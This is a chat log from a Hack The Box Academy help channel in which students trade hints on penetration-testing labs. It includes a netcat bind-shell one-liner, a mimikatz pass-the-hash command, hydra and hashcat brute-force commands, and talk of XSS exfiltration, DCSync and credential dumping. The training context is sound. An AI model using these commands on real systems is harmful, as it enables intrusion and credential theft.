Just got the admin flag for AD Enumeration & Attacks - Skills Assessment Part I. It seems to me like there are multiple ways to skin this cat, ||I used crackmapexec and proxychains to more out the flag on the admins desktop|| Been seeing a lot of folks recommend ligolo, so I think I'm going to redo this scenario using it instead of proxychains. Am I off base with the multiple ways to do this one, or am I on the right track?
you’re on track, ligolo makes things easier and once you master it, you won’t go back to proxychains xd
hi guys, I'm getting an error on the module JAVASCRIPT DEOBFUSCATION / Section Decoding, when solving the exercise, I know I cannot say the flags obtained here but following all the instructions I get the error that the flag is wrong when I'm pretty sure it's right, how can I show here without revealing the flag itself just to get some help?...
I know the answer is right since the exercise is very very easy to complete, and the response I'm getting is obviously a string that looks like a flag, I need a hand
What is the exact question
av catches it tho
Using what you learned in this section, determine the type of encoding used in the string you got at previous exercise, and decode it. To get the flag, you can send a 'POST' request to 'serial.php', and set the data as "serial=YOUR_DECODED_OUTPUT". @manic onyx
I could send the screens here but it would reveal the flag for others so
Use cURL
yes I used, can I send you a DM?
Sure
Anyone who has completed the intro to deserialization skill assessment II, task 2?
in the "Intro to threat hunting with the elastic stack" this statement is made: If we inspect network connections leveraging Sysmon Event ID 3 (Network connection) around the time this file was downloaded, we'll find that Sysmon has no entries. This is a common configuration to avoid capturing network connections created by browsers, which could lead to an overwhelming volume of logs, particularly those related to our email provider. This is where Zeek logs prove invaluable
since zeek is still analyzing the traffic over the network, how would zeek capture less traffic since its still capturing all traffic over the network?
just trying to wrap my head around it
Replace YOUR_DECODED_OUTPUT with... the decoded output
Sysmon and Zeek serve different purposes and operate at different levels of the TCP/IP stack, so they do different stuff.
Sysmon is primarily for endpoint monitoring, and zeek is used for network security monitoring.
Sysmon can't capture traffic coming and going from a router for example, it only captures traffic that reaches or departs an endpoint. Zeek can capture traffic across the whole network.
In the section it is stated that it is not practical to use event ID 3 because of the sheer amount of junk you'll be capturing. As such, it is more useful to use the zeek logs, and filter only for DNS queries.
Hi, about "ADVANCED XSS AND CSRF EXPLOITATION - XSS Filter Bypasses", I am trying to use ||<object data="data:text/html;base64,etc ||, to as usual ||use xhr to download a page and exfiltrate it||. This code bypasses the xss protection and runs the javascript but with errors.
If running in the console I get : "Uncaught DOMException: A network error occurred.", and in the exfiltrate.htb I get "SyntaxError: The URI is malformed.", even though my javascript is the same as usual and the URI is /home.php here.
Any hint ?
Did you close the bracket?
If you mean about the ||<object || then yes, it is shortened here for easiness.
Anyone who's used elastic got any tips for viewing the results of a search, I'm using the Pwnbox but there is a tiny bar which i have to scroll through to see the results, it shows one line at a time and is really fiddly
Target: 94.237.55.163:37053
Life Left: 87 minute(s)
- 1 Run a sub-domain/vhost fuzzing scan on '*.academy.htb' for the IP shown above. What are all the sub-domains you can identify? (Only write the sub-domain name)
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.94.237.55.163:37053/
can someone help me understand why am i only getting errors?
dw got it
Full screen the pwnbox
I need some help understanding something. I often see the different usage of the domains and domain trusts in the AD Lab. Such as FREIGHTLOGISTICS.LOCAL and INLANEFREIGHT.LOCAL. I understand that there is some kind of domain trust going between these two domains. But what i don't really understand is: are these two different domain controllers? Do they have different ip addresses? Or is it strictly inherited and only used by the main domain controller?
Cause when i look at the /etc/hosts file in the linux attacker machine it seems like each subdomain under the domain has its own ip address
hello , is there anyone finished introduction to nosql injection skill assessment || ?
Thank you for the insight
any mods i can talk to in regards of a target machine in the academy ?
Hi, I'm on the introduction to Windows and when I try to connect via RDP to the target, it doesn't work
I use the correct command because I can connect to the target but the connection always drops.
Mods aren't staff
okay. how do i get in touch with staff ?
Need to speak to a person? Learn how to reach our support via HTB Labs.
Green bubble on the academy site
thanks marcie
Firewall and IDS/IPS Evasion - Easy Lab
I can't even see the IDS status page. Just get a timeout. Have reset the box multiple times. Is there a known issue with the box or am I doing something wrong?
NVM, my Kali box was broken somehow
Anyone completed advanced xss and csrf skill assessment? I can redirect myself but I never get promoted
Hi, if you are already there, maybe you can help about this ? : #modules message
I could get the bypass to work with <object> tag
Where should I go if I'm new here?
What was the issue? I'm stuck on this last one and finished the rest of the course
did you change the query? the last action should be ||SMB::FILE_DELETE||
Read #welcome
Does the admin user open all file types in the advanced xss and csrf skill assessment?
Thank you. I did just delete but I guess you have to combine. Weird. Thank you
ok thanks
I'm working on the noSQL injection module skills assessment II and could use a hand crafting the injection.|| I can get the login page to 500 out, but that's as deep as i can get. ||
is the admin user broken for the advanced xss and csrf? I'm using the exfiltrate server to test if the xss ever pops and it does when I visit the uploaded file but I never get any requests from the admin.
I got the feeling the ||<object> tag|| is in a different scope and doesn't have access to the origin cookies, was it an issue you had to solve ?
Asking because the request to /home fails.
I could only get it to pop an alert, ended up using a payload from a cheat sheet they linked to at the bottom of the guide instead
ah ok.... makes more sense
Anyone who completed the intro to deserialization attacks?
Stuck on Skill Assessment Task 2
i need a tool to brute force a netcat server
Working on it too, I assume that I have to do something with token reset page, but I still didn't get it
Hey guys,
for weeks now i am stuck on the AD module Skill Assessment 1... I pwned the WIN-01 machine and got the tpe*** user on MS01. I also got the hash for Administrator using DCSync. But i just can't pass the hash to DC01. Can anyone help ?
Indeed it seems the ||<object>|| didn't have access to the origin, but there is another payload in the link that does. I can now exfiltrate correctly from the user, but not yet from admin, at least not consistently from admin: hard to know if it is a real issue, since there are always weird unpredictable latencies in the "deliver to victim" feature.
EDIT : it worked, just had to wait around 15 minutes for the admin request to reach exfiltrate.htb.... weird...
why can't you pth?
im using this command from the MS01 machine to Pivot to the DC01 machine but it only opens a shell on the MS01 machine again @next bronze
||mimikatz # sekurlsa::pth /user:Administrator /domain:INLANEFREIGHT /ntlm:admin-hash /target:172.16.6.3||
mimikatz will open a shell as the user you pth as but on the same host, so if you want to use mimikatz you'll need to psremote or connect read the flag over smb
try psexec.py
so you mean chisel tunnel Kali VM -> MS01 and then psexec to DC01?
pth directly
I've just started HTB a few days ago and am on a section about basic service exploiting. There's only 1 open service running, openssh v8.4p1. There are no metasploit exploits for it though so I'm fully lost on what to do...
psexec.py from MS01 -> DC01 ?
I guess psexec.py should work from your attacker machine
you can also use evil-winrm
anyone?
Problem is i won't reach the DC in the local network from my attack box, so i would need some kind of pivoting like chisel right?
yes
can someone explain this to me?
Did you try more in depth scans for services? Scan every port
Nmap -p- <IP>
Let me know how you get on with the skill assessment
Was a bit blind and didn't look at the port they gave me. Scanning it found an exploit I could use 😄
How long does a usual full nmap enumeration take with sC and sV enabled?
For top ports it’s quick. For all ports it can be 5ish mins
whenever i'm bruteforcing an ssh enabled acct, am I always able to use hydra against FTP instead?
depends
- ftp has to be enabled
- they have to be using the same authentication source
when those two factors are true then sure
how can I be sure about 2?
damn i thought there was a clue in NMAP or something
sometimes ssh uses an RSA key pair
that too in which you couldnt brute ssh anyways
usually hydra or cme will tell you that it can't because password auth isn't enabled
alright i think i'm officially stuck in the password attacks module, credential hunting in linux section. I can't find Kira's pw. the hint suggests i use the password.list from resources against it. nothing found.. the hint also gives the user's pw but that pw doesn't work to SSH into the machine. made a mutated pw list (love.list) based off that pw in the hint using hashcat, "hashcat love.list -r custom.list --stdout | sort -u > mut_love.list". from here i tried a few things with hydra, "hydra -l Kira -P mut_love.list ssh://<target> -V -t 48", used password.list in there from the resources provided as well, no hits.. am I missing something?
Hi guys, module skills assessment for sqlmap, I found two entry points a**.php and ac***n.php, trying to fuzz some parameters because the response shows me an SQL error, am I on the right way? because I can't find any parameters to try injection
lowercase kira; second make it a habit to do ssh as a last resort
should i default to ftp?
you should first see what services are available
and make a judgement off that
step 0: enumerate/scan
even if you're given a bunch of leading info: sometimes the info assumes a few things
during my scan i did see port 21 and 22 open
got it
ssh is a generally slow service
and in some cases; it can be restricted to only 4 threads at a time
while it's not always the case; always observe best practices when attacking practice environments
and probably some services use the same creds
i had to reset my system and lost all my notes :dead: is there anywhere online filled with notes for the CPTS
nope
there's no online repository of notes for a closed/paid service
take this as a lesson to always have a backup
heck my stuff is on an external drive
just gonna have to go back through and rewrite some stuff
and likely better because you should know most of it by now
okay i'm 2 dumb for this... I transferred chisel.exe via the provided webshell to the WEB-01 machine. However when i execute chisel.exe my shell simply dies. Can anyone guide me ?
chisel has to be running to keep the tunnel up, so the web shell will become unresponsive, as long as the chisel in your attack host is able to connect, you're good
the payload is the malicious code after u gained access, right, while the exploit is the thing that gets u access like the shell. so then why does this say "Exploitation & Security: A payload is code crafted with the intent to exploit a vulnerability on a computer system. The term payload can describe various types of malware, including but not limited to ransomware."
Payloads Deliver us Shells
The payload is the malicious code that allows you to take advantage of an exploit
it's not necessarily after you gained access
oh i c
in fact it says it right there
" Exploitation & Security: A payload is code crafted with the intent to exploit a vulnerability on a computer system."
sometimes it's internal but you gotta exploit something externally first usually to gain access internally
I am looking for some guidance on the lab Brute Forcing Weak Access Tokens in the Attacking Authentication Mechanisms module. I have tried several approaches and found multiple valid tokens. However, I keep getting redirected to the "Not Authorized" page when I try to use any of the found tokens or cookies. I feel like I am missing something (silly), or that something seems to be broken.
Has anyone successfully completed this lab?
anyone got a hint for finding the admin email address?
I'm trying to do shells & payloads, but can't RDP in the "Reverseshell" section. anybody else has similar problems?
problem persists since yesterday
this is for IMAP and POP3 sections of footprinting module?
can someone hint me like what to google to figure it out? Please don't give me answer tho I wanna be able to figure it out and learn
Imap commands, there's a link to an article buried somewhere in this chat
ok thanks
If you read the email you can generally get all the info from it
ok thanks
ok, pwnbox actually worked, but kali with remmina / xfreerdp didn't work and also a windows workstation with rdp didn't work at all... very confusing...
Well in your own vm you need to be connected to the vpn
really, i didn't know that..
...how are you expected to connect to an internal resource if you aren't physically plugged in.
The vpn facilitates a connection to htb resources
i was joking 😄 of course i was connected to the VPN not my first module
Listen there's too many people that are dumb for me to not think thats the case
not gonna lie sometimes i forget to connect / switch vpn to the right one, but as soon as i get my first "can't reach host" i normally remember 😄
I feel like although I learned about Rubeus, I still don't know what it's doing.
does anyone htb-student@ubuntu:~$ rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 1234 > /tmp/f
nc: Cannot assign requested address
why wont this work
the address youre listening on isn't correct
oh right, that's correct, danke
finally got it, ping me if you need some help
though I have to admit, the assessment for the AD enums and attacks module is super cool I feel like all of the things i learned up to that point are being applied, from pivoting to everything else. Only downside is one thing didn't work correctly and was supposed to on the first assessment still trying to figure out what went wrong.
pretty exciting stuff.
PHP web shells - Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif)
I am following what was taught in the module but whenever I upload the webshell.php file it fails
use burp
I used burp to modify the content type but it still wont upload
then something was wrong
Mhh
There was an extra step that needed to be taken that was not mentioned in the module
Can i get some help for Exploiting Web Vulnerabilities in Thick-Client Applications.
I cant seem to compile it again.
breaks everything
hard to share without giving out info so
What
when i recompile for the download of the jar file it breaks the application. I tried to follow the course but i can't seem to get it. Been stuck now for a while
What app do you use to recompile
javac
i dont get an error. It just wont download the file at all
The thing is that it looks weird when editing the file as well, since all the lines start with
/* 223 */
Or something
but not the code that's been edited
which makes me think that's what breaks it, but as it's a comment that doesn't make sense really
you might have messed up the formatting while editing it, I would suggest transferring the files out and edit them in vscode or something, also you can follow a walkthrough of fatty
From what I've heard the section is now more comprehensive
oh did they update it? that's good
Apparently it's now more "follow the section" than "here's something that you likely will rarely ever see"
nice to have an insane challenge in an "attacking common applications" module lol
which one , this is my next module
Exploiting Web Vulnerabilities in Thick-Client Applications.
this one
for user.txt
Fatty forced me way out of my comfort zone. The majority of the box was reversing and modifying a Java thick client. First I had to modify the client to get the client to connect. Then I’ll take advantage of a directory traversal vulnerability to get a copy of the server binary, which I can reverse as well. In that binary, first I’ll find a SQL ...
the pain for me is just that i have to either transfer a java file on and off and on and off. Or edit using default notepad
good night, good fight 🙂
yeah thats it for me
Working the footprinting hard box. I have access to “the user” and am looking through his files. Not sure what I’m trying to find now. See his logs, and see some docs that have unreadable characters
Hi, I'm not even in the exam, and I see the error message of Exam entrypoint ips have been moved to a new location at the top of my page on academy. Does it happen for someone else?
Hey @placid edge did you have issues with the first assessment of the AD attacks/enums module?
I had a bit of trouble with getting the 2nd account js
Is anybody else having issues with OpenVAS installation on the vulnerability assessment modules? It is not installing at all
more time wasted on disconnecting machines and unreliable service
i can rdp through packet radio better than this, a premium service.
just terminated both instances
i really dont have any time for this lame shit.
Did you figure this one out?
Nope, took a break
There's a service you haven't found yet
Still better than PEN-200
the discord users carry everyone for that course since the forums are long dead.
johnCkirk the legend
💐
Stuck on WINDOWS PRIVILEGE ESCALATION: Communication with Processes
Question: Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?
I got the thing as in the pic but why is the answer not being accepted as ||NT SERVICE||
did you put the \ in your answer?
the answer is in your screen shot
copy and paste it starting from NT and ending at the number
DONE
thanks..!
I got confused as i saw some different hint given by some one in the forums...
Hi, currently working on User Enumeration via Response Timing from white-box attacks, is there a way to get a shorter wordlist? the one suggested by the module is too big and I'm currently getting a lot of usernames enumerated, thanks for any help
Shells & payloads Live Engagement - I made a payload with msfvenom, I uploaded a webshell and navigated to the directory, I checked for exploits and attempted metasploit. None have worked so far. Any tips or hints on this?
Are you kidding me lol
Can anyone give me a nudge on the AD Skills Assessment? I'm in an RDP session on MS01 trying to find the cleartext password for the user in question. Using mimikatz with "sekurlsa::logonpasswords" shows the user and the NTLM hash, but I am unable to crack it. The other mimikatz commands do not show that user.
There doesn't seem to be a rhyme or reason as to what users show up for what commands.
kerberos::list /export did not give the username
Also, running "Get-DomainUser * -spn | select samaccountname" does not show this username.
The only way I found the username was on C:\Users, and it seemed to be a pretty obvious account
username is tp***y so that those that have done this know if I'm on the right track
How do I go about getting a plaintext password?!
The output for the tp***y user looks like this, this is just a different user as an example so that there are no spoilers
did u try checking comments?
Which comments?
I cracked the NTLM for svc_sql just to make sure it wasn't the hashcat mode. svc_sql worked.
i know the password it wont be in a list
So should I use a rule? random numbers?
i was thinking it might be in a comment or something
since the question asks for plaintext
the module mentions a bunch of different enumeration methods for credentials, what have you tried besides just mimikatz
i dont remember how i answered it. it was a while ago
i was thinking maybe try the ldap filter
Get-DomainUser -Identity t****y | Get-DomainSPNTicket -Format Hashcat
That didn't work
before messing with other networked stuff that you would have already had access to, what other post compromise enumeration can you do on the box
I just did this question, the current way of it is not working properly, you won't see the cleartext following the correct approach, I managed to get it by using lazagne.
Rubeus did not work either
what else
Will you dm me?
why spoil it
smh
I'm guessing the NTLM hash should crack with hashcat?
it's not like that; there is no way to get the answer as of right now without some serious help from the forums.
Incorrect
hmmmm
the tools and stuff don't give the cleartext.
that's not the right tool for the approach; even if you used it, it would point to the wrong account.
what is the dpapi section of the module
if I show the pic with the error it will spoil the intended approach
you think so? interesting.
it was a taught method that works
I wouldn't have thought of using Lazagne as it wasn't mentioned anywhere in the module
the active directory and the attacking common applications modules are the most brutal
lazagne was covered in password attacks
the course modules presume you have done the prior ones
I'll admit the assessment really has been a fun experience putting everything you learned in the other modules to use ^^
This article describes several techniques for reading DPAPI keys, including DPAPI backup keys from domain controllers, which can ultimately help to gain access to the secrets of any user within the domain.
I was looking back at the password attacks module. Hadn't got to lazagne yet
why are you skipping modules
dont do that
making shit harder for yourself for no reason
yeah i tried everything from stealing the SAM database and trying to crack the hash too @heavy marsh
good mindset but wont give you the answer
iirc secretsdump can work too but idr for sure
wasn't skipping, was just reading back
lol
LaZagne didn't work, 0 passwords found
u can skip modules if you want to
ah k it sounded like you hadnt done it
no, I knew they are intended to be done in order, so I've stuck with that
you can skip but dont cry about it if things end up harder because you missed prior taught info
thats all
proverbial you ftr
I have each module in markdown so that I can find stuff from previous ones easily if I can't see it in my notes
so without LaZagne I'm not sure, I'll keep looking at the password attacks options
As long as someone can confirm that the NTLM hash is not crackable that makes me feel better
Isn't secretsdump a python program?
yeah but it gets dpapi i think
secretsdump is rad
I'm running powershell from the rdp session
sometimes ill dump admin ntlm hash just so I can run secretsdump instead of mimikatz lul
u gotta run powershell as admin and then run lazagne thru it
whole point of secretsdump is you use it remotely
yeah which is why I prefer to lower my reliance on it as much as reasonable to do so
still good and easy to make undetected
secretsdump not dropping files to disk(iirc) is rad
yeah I ain't pretending it's perfectly stealthy or anything
lazagne just runs and disappears when I run it from powershell
I saw it said shahash found, but no cleartext
sure lazagne copied properly? sounds like an error if it found nothing
It showed output in realtime but then the cmd window closed
No, it was strange. I'm going to make it an early night. I'll try again tomorrow.
Thank you all for the help!
I did. I saw some weird output on the defaultpassword section to the effect of "supersecretdomainpassword" or something like that.
Yeah I ran powershell as admin
¯\_(ツ)_/¯
I'll start with a fresh machine tomorrow.
that's the right password tho
I cant see a reason why it would close the window
I'm going to look for an output of what lazagne normally looks like so I know when I try it again.
The password that showed was in no way connected to the username so I don't know how that all works
It just said defaultpassword
Tried that too.
yeah and?
No file came out
then you did it wrong
Like I said, lots of weird things going on, going to try again tomorrow with a fresh machine.
where is a ticket dude i need assistance @_@
defaultpassword is a normal field you can see creds stored in sometimes
there isn't one.
ptt
oki, thank you 😄 so im in the password attacks attacking lsass
pass the ticket
and the screen keeps jumping when i try to type
the subscription dont come with free private tutors @terse igloo the discord operates as a tax deductible charity
and no input comes out
anyway I'm passing the ticket to ransomthehost, have a good night all!
anywho, outside of getting an answer i did ask about , i dont need a tutor 😄
what's a ticket person?
what?
just use that chat on the website
@_@
this is discord the charity
ohhhhhh you a silver academy peep?
ah Ive never seen someone actually get timely help from that
the charity is better
I mean no shit you pay for academy lul
xD
this is fact
youre better off just clearly asking your question and explaining your problem
instead of just saying I need help and a box is bouncing
well, as i stated above 🙂 i cannot type in the rdp cmd prompt, the terminal jumps and no type
sir, have you tried turning it off and on again?
yes mam
what does terminal jump mean
and i am a mam is what i mean jinn 😄
excuse me ma'am
danke'
i can share you the shot
? I dont see a problem
no shit
xfreerdp /v:<ip> /u:htb-student /p:"HTB_@cademy_stdnt!" /cert:ignore /workarea
try using /workarea at the end
ok thank you ^^
do you mean like you cant see the start menu cause of the resolution?
no, i mean i go to type a letter to start my syntax
and the minute i hit a key
the screen jumps up and i gotta scroll up to it to see if it typed at all
but nope
is it ANY letter that does this?
yes
what kind of keyboard are you using
did you try /workarea at the end
because I could see a scenario where youre using an atypical keyboard layout and its mismatched with the remote machine and interpreting keypresses as other keys. Thats why I ask.
also did you try jinns suggestion yet
for me it's mom coming into the basement to deliver me a pizza pocket that scolds my mouth as i eat it and falls into the [SHIFT] key lodging it stuck and enabling sticky keys on windows
what a nightmare omg
no no lol not at all
so youre using an american US keyboard layout?
lmao
yes no?
its a pretty simple question
if you dont want to take your problem seriously why should I
good luck
i already did ^^
idc I shouldnt need to ask three times for a basic answer and get lols in response
good luck figuring it out, Ive got other stuff Id rather do now
mood
reported 🙂
for not helping you for free lmao 😂
U didn't help me jinn did 😉 looks like he was the better man in this
shells & payloads live engagement - I tried env command but I cant find the shell
but random reporting because you dont like that someone didnt want to help you anymore means you can go fuck yourself 🙂
no soliciting sales 😄 i dont buy
Hi I was curious for which account does the get-domainsid generate the sid for? I tried to look for it using the command Get-ADDomain -Identity $DomainSID but it does not work
it's somewhere in there
any idea why this is happening I am in ad enumeration attacking domain trusts section
sorry we got off on the wrong foot 🙂
howdy people
question, can you use a hash from a dcsync attack to perform a pth attack?
dcsync is ggnore youve compromised the domain
besides even the DA hashes. there's all the machine hashes. and also krbtgt's hash which can forge kerberos tickets.
I am looking for some guidance on the lab Brute Forcing Weak Access Tokens in the Attacking Authentication Mechanisms module. I have tried several approaches and found multiple valid tokens. However, I keep getting redirected to the "Not Authorized" page when I try to use any of the found tokens or cookies. I feel like I am missing something (silly), or that something seems to be broken.
What is CPTS?
certification from HTB Academy
well start doing the course then
i just finished the getting started knowledge check and got it solo, ive done two paths and started the information security path
im addicted lol this is super fun
nice, good luck
ty
Massive thank you to twopoint and olliz0r on here I spent days stuck on Intro to assembly code and they helped me understand it bit more cant thank them enough
Is RDP always so laggy in general? 
yeah kinda tbh
It really ups the stress level 
youre streaming video and input over a vpn tunnel over the internet to virtualized machines likely from a virtual machine. it gunna lag lol
Deep joy
Quite often
Switching to TCP in openvpn makes things little better
Good idea! I'll try that. Thanks
I tried creating a golden ticket with the Administrator's account...then rdp didnt work properly...lol
it wont ptt with the administrator acc im going to assume maybe kbrtgt is more appropriate
finally i got it
that Exploiting Web Vulnerabilities in Thick-Client Applications was such a pain in my ass. With some sprinkles of lag
Hmm I try
yep nothing working
im tired gonna continue this later
I keep getting this error
"ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)"
really annoying i think it's the target machine having an issue or something made sure to use the runas /netonly with the appropriate acc
ADVANCED XSS AND CSRF EXPLOITATION - Skills Assessment. i managed to craft a xss payload and run it, but it seems that admin does not look at the payloads automatically. it also mentioned only that admins can access the files, but in the tasks section that admins automatically check the files. so i guess that the admin does not check the uploaded files automatically. Stuck for now, anyone can guide me to the next step or give me a direction?
I'm stuck at the exact same point, have you managed to progress on this?
no still trying. for me it would be nice if i could confirm whether an admin automatically checks the file uploads or not. then i know for sure if i do something wrong 🙂
@heavy lily @median patrol The files are not automatically checked. Keep in mind that the module does not only cover XSS attacks but another class of attacks as well 🙂
Feel free to DM me in case you get stuck again
hi, still performance / spawning issues ?
no
Cool thanks
A section that will be remembered..!
Hall of Frame 
Linux File Transfer Methods. I try to transfer a file with exec 3<>/dev/tcp/IP/port, when I enter cat >&3 it doesn't show anything. I can get this file with wget, but not with the exec method.
Question, when you already finished the module and your subscription ended (silver annual for example), do we still have access to that module?
yes
@next bronze thanks, how about those already started but not yet finished ? 🙂
Does anyone know if enterprise accounts have access to all Academy content or only certain modules for the vouchers they cover?
nope, you only permanently unlock them once it's completed
that would depend on the level of access for your enterprise plan
the exercise is based off of the author's insane box called "fatty" so it's just randomly in there, likely just content filler but still cool to know for fun.
it's not easy though
yaay you did it!
another day another terrible experience trying to get this box to spawn and stay online
/me sighs
Got it, thanks! 🙂
it's vexing to have my productivity inhibited by the ineptitude of an organization that is happy to charge 100$ for tier 4 modules that tell you to use google images for grappling hooks but can't be bothered to provide a stable environment.
i find great disparity in the corporate osint module vs tradecraft used practically irl
why is it 100$
To be fair they also charge no more than $5 for an introductory course to Python which has taken a senior dev 80+ hours to produce. Sure, that price has been paid off in high volume since then, but if we were to put a fair price tag on it, I'd say let me look it over once more than bump up the price to $50
Keep it up.
scary cause of the CPTS exam is coming lol
Insert : Click it gif*
good luck with a stable network
i hope on the exam the network is much better than the academy atm
change it to http 👍